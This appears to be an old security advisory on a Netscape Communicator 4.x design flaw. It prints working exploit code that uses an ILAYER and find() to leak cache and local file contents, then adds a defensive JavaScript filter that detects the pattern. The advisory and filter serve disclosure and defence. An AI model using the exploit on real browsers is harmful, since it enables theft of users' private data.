COMMAND

    Netscape's find()

SYSTEMS AFFECTED

    Win systems with Netscape 4.x

PROBLEM

    Georgi Guninski found the following.  There is a design flaw in
    Netscape Communicator 4.5 on Win95 and 4.08 on WinNT (the guess is
    that all 4.x versions are vulnerable) which allows the following
    security exploits:
        *) Reading the parsed content of local HTML files (by 'parsed'
           we mean the text the user sees, not the actual HTML source)
        *) Reading the  parsed content of  HTML files on  a web server
           blocked by a firewall (the browser and the web server  must
           be on the same side of the firewall)
        *) Reading the user's cache
        *) Browsing directories
        *) Probably others

    The exploits use the JavaScript find() function and the ILAYER tag.
    This may also be exploited through an HTML message.  A demonstration
    is available at:

        http://www.nat.bg/~joro/nsfind.html

    Exploit follows:

    MBEGIN
    <ILAYER SRC="wysiwyg://1/about:cache">
    </ILAYER>

    <SCRIPT>
    // Marker text that precedes the data to extract (here a string that
    // appears in about:cache, loaded into the ILAYER above).
    //mag='MBEGIN';
    mag='Average cache';
    // Marker text placed after the ILAYER; find(mend) moves the selection
    // past the layer so that the backward searches below cover its text.
    mend='MEND';
    res=mag;
    charstoread=100;

    function readit() {
      for(i=0;i<charstoread;i++) {
        t=res;
        find(mend);
        // Try every character code: find(str, caseSensitive, backwards)
        // returns true only when the prefix extended by that character
        // exists in the document, so each hit leaks one more character.
        for(c=1;c<256;c++) {
          t=res + String.fromCharCode(c);
          if (find(t,true,true)) {
            //alert(c);
            res=t;
          }
        }
      }
      res=res.substring(mag.length);
      alert("The first URL in your cache is: \n" + res);
    }
    setTimeout('readit();',3000);
    </SCRIPT>

    MEND

SOLUTION

    Workaround: disable JavaScript.  The exploit still appears to work
    after Netscape's release of 4.51.
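    Since the only workaround above is to disable JavaScript, a mail
    gateway or content filter can at least flag messages that combine
    the two ingredients of this leak: a LAYER/ILAYER whose SRC loads a
    browser-internal or local URL, and a script block that calls find().
    The heuristic below is an added example, not code from the advisory
    or from Netscape; the sample messages are constructed, and the list
    of flagged URL schemes (wysiwyg:, about:, file:) is an assumption
    based on the advisory's description of what can be read.

```javascript
// Added example (not from the advisory or Netscape): a coarse content
// filter for HTML messages that pairs a LAYER/ILAYER loading internal or
// local content with a script that calls find().  Samples are constructed.

// <ILAYER ...> or <LAYER ...> with a SRC attribute; captures tag and URL.
const LAYER_TAG_RE = /<(ILAYER|LAYER)\b[^>]*\bSRC\s*=\s*["']?([^"'\s>]+)/gi;
// URL schemes (assumed list) that expose browser-internal or local content.
const INTERNAL_SRC_RE = /^(wysiwyg:|about:|file:)/i;
// <SCRIPT> ... </SCRIPT> bodies.
const SCRIPT_RE = /<SCRIPT\b[^>]*>([\s\S]*?)<\/SCRIPT>/gi;
// A call to find(); coarse, so it also matches any method named find.
const FIND_CALL_RE = /\bfind\s*\(/;

function scanHtmlMessage(html) {
  const reasons = [];
  let internalLayer = false;
  let layerCount = 0;
  let findScripts = 0;
  let m;

  LAYER_TAG_RE.lastIndex = 0;
  while ((m = LAYER_TAG_RE.exec(html)) !== null) {
    layerCount++;
    const tag = m[1].toUpperCase();
    const src = m[2];
    if (INTERNAL_SRC_RE.test(src)) {
      internalLayer = true;
      reasons.push(`${tag} loads browser-internal/local URL ${src}`);
    } else {
      reasons.push(`${tag} loads external URL ${src}`);
    }
  }

  SCRIPT_RE.lastIndex = 0;
  while ((m = SCRIPT_RE.exec(html)) !== null) {
    if (FIND_CALL_RE.test(m[1])) findScripts++;
  }
  if (findScripts > 0) reasons.push(`${findScripts} script block(s) call find()`);

  // Both ingredients together on internal content is the leak pattern;
  // either one alone, or a layer of external content plus find(), only
  // merits a look.
  let verdict = 'clean';
  if (layerCount > 0 && findScripts > 0) verdict = internalLayer ? 'block' : 'review';
  else if (layerCount > 0 || findScripts > 0) verdict = 'review';
  return { verdict, reasons };
}

// Constructed sample messages.
const SAMPLE_LEAK = [
  '<ILAYER SRC="wysiwyg://1/about:cache"></ILAYER>',
  '<SCRIPT>',
  "function readit(){ if (find('x',true,true)) { alert('hit'); } }",
  "setTimeout('readit();',3000);",
  '</SCRIPT>',
].join('\n');

const SAMPLE_BENIGN =
  '<HTML><BODY><P>Meeting moved to 3pm.</P>' +
  '<SCRIPT>document.write(new Date().toString());</SCRIPT></BODY></HTML>';

const SAMPLE_LAYER_ONLY =
  '<ILAYER SRC="http://intranet.example/news.html"></ILAYER><P>Hello</P>';

for (const [name, body] of Object.entries({ SAMPLE_LEAK, SAMPLE_BENIGN, SAMPLE_LAYER_ONLY })) {
  const r = scanHtmlMessage(body);
  console.log(`${name}: ${r.verdict}`, r.reasons);
}
```

    The filter is deliberately simple: it reports a verdict of 'block'
    only when an ILAYER/LAYER of internal content and a find() call occur
    in the same message, and 'review' for either ingredient on its own,
    so a legitimate page that merely uses layers is not dropped.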